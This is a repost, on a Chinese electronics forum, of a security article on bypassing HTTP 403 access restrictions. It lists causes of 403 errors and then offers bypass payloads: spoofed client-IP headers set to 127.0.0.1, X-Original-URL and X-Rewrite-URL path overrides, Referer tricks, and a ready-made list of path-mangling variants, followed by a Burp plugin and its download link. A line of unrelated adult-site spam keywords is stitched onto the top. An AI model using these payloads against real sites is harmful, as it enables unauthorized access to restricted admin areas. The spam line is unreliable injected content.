99精品伊人亚洲|最近国产中文炮友|九草在线视频支援|AV网站大全最新|美女黄片免费观看|国产精品资源视频|精彩无码视频一区|91大神在线后入|伊人终合在线播放|久草综合久久中文

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

繞過(guò)403訪問(wèn)資源TIPS及工具

jf_Fo0qk3ln ? 來(lái)源:FreeBuf.COM ? 2023-07-07 10:43 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

在瀏覽網(wǎng)站的時(shí)候,經(jīng)常會(huì)遇到403的狀態(tài)碼,表示不允許訪問(wèn)。該狀態(tài)表示服務(wù)器理解了本次請(qǐng)求但是拒絕執(zhí)行該任務(wù),該請(qǐng)求不該重發(fā)給服務(wù)器。指的是服務(wù)器端有能力處理該請(qǐng)求,但是拒絕授權(quán)訪問(wèn)。

這就意味著這里面有東西,我們只需繞過(guò)它。

造成403的原因

先來(lái)看看造成403可能得原因有哪些?

1、你的IP被列入黑名單。

2、你在一定時(shí)間內(nèi)過(guò)多地訪問(wèn)此網(wǎng)站(一般是用采集程序),被防火墻拒絕訪問(wèn)了。

3、網(wǎng)站域名解析到了空間,但空間未綁定此域名。

4、你的網(wǎng)頁(yè)腳本文件在當(dāng)前目錄下沒(méi)有執(zhí)行權(quán)限。

5、在不允許寫/創(chuàng)建文件的目錄中執(zhí)行了創(chuàng)建/寫文件操作。

6、以http方式訪問(wèn)需要ssl連接的網(wǎng)址。

7、瀏覽器不支持SSL 128時(shí)訪問(wèn)SSL 128的連接。

8、在身份驗(yàn)證的過(guò)程中輸入了錯(cuò)誤的密碼。

9、DNS解析錯(cuò)誤,手動(dòng)更改DNS服務(wù)器地址。

10、連接的用戶過(guò)多,可以過(guò)后再試。

11、服務(wù)器繁忙,同一IP地址發(fā)送請(qǐng)求過(guò)多,遭到服務(wù)器智能屏蔽。

繞過(guò)方式

1)修改user-agent

有的應(yīng)用為了區(qū)分爬蟲(chóng)或者正常請(qǐng)求,會(huì)驗(yàn)證user-agent,看是否瀏覽器發(fā)出的請(qǐng)求。

2)繞過(guò)IP限制

部門網(wǎng)站只允許特定的IP進(jìn)行訪問(wèn),應(yīng)該會(huì)驗(yàn)證客戶端的IP,如果不是規(guī)定的IP,則會(huì)返回403。

可以通過(guò)下面的方式繞過(guò):


	
X-Originating-IP: 127.0.0.1


X-Remote-IP: 127.0.0.1


X-Client-IP: 127.0.0.1


X-Forwarded-For: 127.0.0.1


X-Forwared-Host: 127.0.0.1


X-Host: 127.0.0.1


X-Custom-IP-Authorization: 127.0.0.1

3)修改Referer

網(wǎng)站限制了訪問(wèn)來(lái)源,如果訪問(wèn)來(lái)源不符合,則也會(huì)返回403

繞過(guò)方式:

設(shè)置referer為訪問(wèn)網(wǎng)站的host

4)url覆蓋繞過(guò)

用戶可以使用X-Original-URL或X-Rewrite-URL HTTP請(qǐng)求標(biāo)頭覆蓋請(qǐng)求URL中的路徑,嘗試?yán)@過(guò)對(duì)更高級(jí)別的緩存和Web服務(wù)器的限制。

可以這樣繞過(guò)的原因:有很多的web應(yīng)用,只對(duì)uri地址內(nèi)容進(jìn)行權(quán)限檢查,這就導(dǎo)致uri路徑正常訪問(wèn)之后,我又覆蓋了新的地址,導(dǎo)致403 ByPass

請(qǐng)求包


	
GET / HTTP/1.1
X-Original-URL: /adminstration
X-Rewrite-URL: /adminstration
Host: www.abc.com
Host: 192.168.56.108

5)擴(kuò)展名繞過(guò)

基于擴(kuò)展名,用于繞過(guò)403受限制的目錄。


	
site.com/admin => 403


site.com/admin/ => 200


site.com/admin// => 200


site.com//admin// => 200


site.com/admin/* => 200


site.com/admin/*/ => 200


site.com/admin/. => 200


site.com/admin/./ => 200


site.com/./admin/./ => 200


site.com/admin/./. => 200


site.com/admin/./. => 200


site.com/admin? => 200


site.com/admin?? => 200


site.com/admin??? => 200


site.com/admin…;/ => 200


site.com/admin/…;/ => 200


site.com/%2f/admin => 200


site.com/%2e/admin => 200


site.com/admin%20/ => 200


site.com/admin%09/ => 200


site.com/%20admin%20/ => 200

常用payload匯總

$1代表HOSTNAME

$2代表PATH


	
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
* $1/./$2/./
$1/$2anything -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/

常用工具

BurpSuite插件 403Bypasser:可以在burp擴(kuò)展商店安裝

221bd12c-1c5e-11ee-962d-dac502259ad0.jpg

BurpSuite插件 BurpSuite_403Bypasser

項(xiàng)目地址:https://github.com/sting8k/BurpSuite_403Bypasser

網(wǎng)盤下載鏈接:https://pan.quark.cn/s/f164943c749b


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • IP
    IP
    +關(guān)注

    關(guān)注

    5

    文章

    1805

    瀏覽量

    152566
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    13

    文章

    9793

    瀏覽量

    87956
  • 瀏覽器
    +關(guān)注

    關(guān)注

    1

    文章

    1040

    瀏覽量

    36287

原文標(biāo)題:繞過(guò)403訪問(wèn)資源TIPS及工具

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    apache 403錯(cuò)誤 Forbidden解決方法

    。原因3:還是Directory權(quán)限問(wèn)題(不常發(fā)生)如下文:拒絕10.0.0.0/24整段訪問(wèn)。這樣被拒絕的主機(jī)訪問(wèn)就會(huì)出現(xiàn)403錯(cuò)誤 Options Indexes FollowSymLinks
    發(fā)表于 01-25 14:54

    VISA當(dāng)前無(wú)法訪問(wèn)資源

    visa報(bào)的錯(cuò)誤為:0xBFFF0072 (VI_ERROR_RSRC_BUSY)資源有效,但VISA當(dāng)前無(wú)法訪問(wèn)資源。串口出現(xiàn)問(wèn)題,不執(zhí)行?如何解決?請(qǐng)高手指導(dǎo)!
    發(fā)表于 05-10 17:47

    6678多任務(wù)資源訪問(wèn)沖突問(wèn)題

    忽略了硬中斷對(duì)共享資源的操作。 謝謝,其實(shí)就是在DSP中如何解決不同優(yōu)先級(jí)的進(jìn)程對(duì)共享資源訪問(wèn)的問(wèn)題!DSP中有沒(méi)有類似于C中的信號(hào)量互斥機(jī)制,再次感謝。
    發(fā)表于 06-21 12:07

    apache 403錯(cuò)誤 Forbidden解決方法

    原因。原因3:還是Directory權(quán)限問(wèn)題(不常發(fā)生)如下文:拒絕10.0.0.0/24整段訪問(wèn)。這樣被拒絕的主機(jī)訪問(wèn)就會(huì)出現(xiàn)403錯(cuò)誤 Options Indexes FollowSymLinks
    發(fā)表于 11-23 15:14

    AT32F403A的相關(guān)資料下載

    ://www.arterytek.com/cn/product/AT32F403.jsp?t=1618761051562 在此界面可以下載參考手冊(cè)-數(shù)據(jù)手冊(cè)-開(kāi)發(fā)板-開(kāi)發(fā)包-下載工具-調(diào)試工具-驅(qū)動(dòng)軟件-應(yīng)用手冊(cè)論壇:https
    發(fā)表于 12-10 08:23

    AT32F413_403A_407_F435_F437開(kāi)啟訪問(wèn)保護(hù)(FAP)補(bǔ)充說(shuō)明

    AT32F413_403A_407_F435_F437開(kāi)啟訪問(wèn)保護(hù)(FAP)補(bǔ)充說(shuō)明為了提高加密性能,需對(duì)開(kāi)啟訪問(wèn)保護(hù)(FAP)操作流程進(jìn)行優(yōu)化。
    發(fā)表于 10-23 07:49

    基于數(shù)據(jù)流分析與識(shí)別的Web資源訪問(wèn)控制

    針對(duì)動(dòng)態(tài)Web頁(yè)面資源中的實(shí)施細(xì)粒度和透明訪問(wèn)控制問(wèn)題,定義片斷的概念,提出基于數(shù)據(jù)流分析的“片斷”級(jí)Web頁(yè)面資源訪問(wèn)控制方法,分析數(shù)據(jù)流中的請(qǐng)求信息與響應(yīng)片斷的
    發(fā)表于 04-09 09:27 ?23次下載

    網(wǎng)絡(luò)技能tips

    網(wǎng)絡(luò)技能tips 1.清除路由器口令: 有時(shí)候,我們常常會(huì)忘記路由器的密碼,為了找回密碼,正常進(jìn)入設(shè)備進(jìn)
    發(fā)表于 01-13 12:58 ?1790次閱讀

    在MATLAB環(huán)境中調(diào)用DLL對(duì)硬件資源訪問(wèn)的方法

    MATLAB是一款高性能的科學(xué)與工程計(jì)算軟件,具有強(qiáng)大的數(shù)值計(jì)算和分析能力,但其對(duì)硬件的訪問(wèn)能力較弱。在MATLAB環(huán)境中實(shí)現(xiàn)對(duì)硬件資源的直接訪問(wèn)可以極大的方便對(duì)數(shù)據(jù)的處理及算法
    發(fā)表于 08-08 14:13 ?0次下載
    在MATLAB環(huán)境中調(diào)用DLL對(duì)硬件<b class='flag-5'>資源</b><b class='flag-5'>訪問(wèn)</b>的方法

    RAM Constrained Design Tips

    An summary about FreeRTOS:RAM Constrained Design Tips
    發(fā)表于 03-10 16:14 ?0次下載

    Linux端口轉(zhuǎn)發(fā)的常用方法,來(lái)繞過(guò)網(wǎng)絡(luò)訪問(wèn)限制觸及目標(biāo)系統(tǒng)

    在一些實(shí)際的場(chǎng)景里,我們需要通過(guò)利用一些端口轉(zhuǎn)發(fā)工具,比如系統(tǒng)自帶的命令行工具或第三方小軟件,來(lái)繞過(guò)網(wǎng)絡(luò)訪問(wèn)限制觸及目標(biāo)系統(tǒng)。
    的頭像 發(fā)表于 09-14 15:07 ?8857次閱讀
    Linux端口轉(zhuǎn)發(fā)的常用方法,來(lái)<b class='flag-5'>繞過(guò)</b>網(wǎng)絡(luò)<b class='flag-5'>訪問(wèn)</b>限制觸及目標(biāo)系統(tǒng)

    P2link——強(qiáng)大的內(nèi)網(wǎng)穿透和遠(yuǎn)程訪問(wèn)工具

    P2Link作為一款強(qiáng)大的內(nèi)網(wǎng)穿透和遠(yuǎn)程訪問(wèn)工具,可以幫助用戶輕松實(shí)現(xiàn)網(wǎng)絡(luò)連接和數(shù)據(jù)傳輸。特別適用于在復(fù)雜網(wǎng)絡(luò)環(huán)境中需要遠(yuǎn)程訪問(wèn)內(nèi)網(wǎng)資源的場(chǎng)景,如遠(yuǎn)程辦公、設(shè)備管理和云服務(wù)等。
    的頭像 發(fā)表于 11-01 14:21 ?1028次閱讀

    海外IP代理池:解鎖全球網(wǎng)絡(luò)資源的重要工具

    海外IP代理池作為一種網(wǎng)絡(luò)工具,確實(shí)在解鎖全球網(wǎng)絡(luò)資源方面發(fā)揮著重要作用。通過(guò)使用海外IP代理池,用戶可以繞過(guò)地理位置限制,訪問(wèn)特定國(guó)家或地區(qū)的網(wǎng)絡(luò)
    的頭像 發(fā)表于 11-14 07:36 ?625次閱讀

    微軟起訴繞過(guò)云AI安全工具開(kāi)發(fā)者

    微軟公司近期針對(duì)某組織提起了一宗法律訴訟,指控該組織故意開(kāi)發(fā)并使用非法工具,以繞過(guò)微軟云AI產(chǎn)品的安全防護(hù)措施。這一行為導(dǎo)致未經(jīng)授權(quán)的訪問(wèn),并生成了有害內(nèi)容,對(duì)微軟的系統(tǒng)和用戶安全構(gòu)成了嚴(yán)重威脅
    的頭像 發(fā)表于 01-13 14:46 ?485次閱讀

    403 Forbidden是什么意思?最佳解決方法有哪些?

    請(qǐng)求的資源或操作受到了訪問(wèn)控制列表(ACL)的限制,或者請(qǐng)求的用戶沒(méi)有足夠的權(quán)限,服務(wù)器就會(huì)拒絕授權(quán)執(zhí)行此請(qǐng)求。下面 華納云 整理的關(guān)于403 Forbidden產(chǎn)生原因及解決方法內(nèi)容希望對(duì)大家有所幫助!
    的頭像 發(fā)表于 06-25 16:33 ?660次閱讀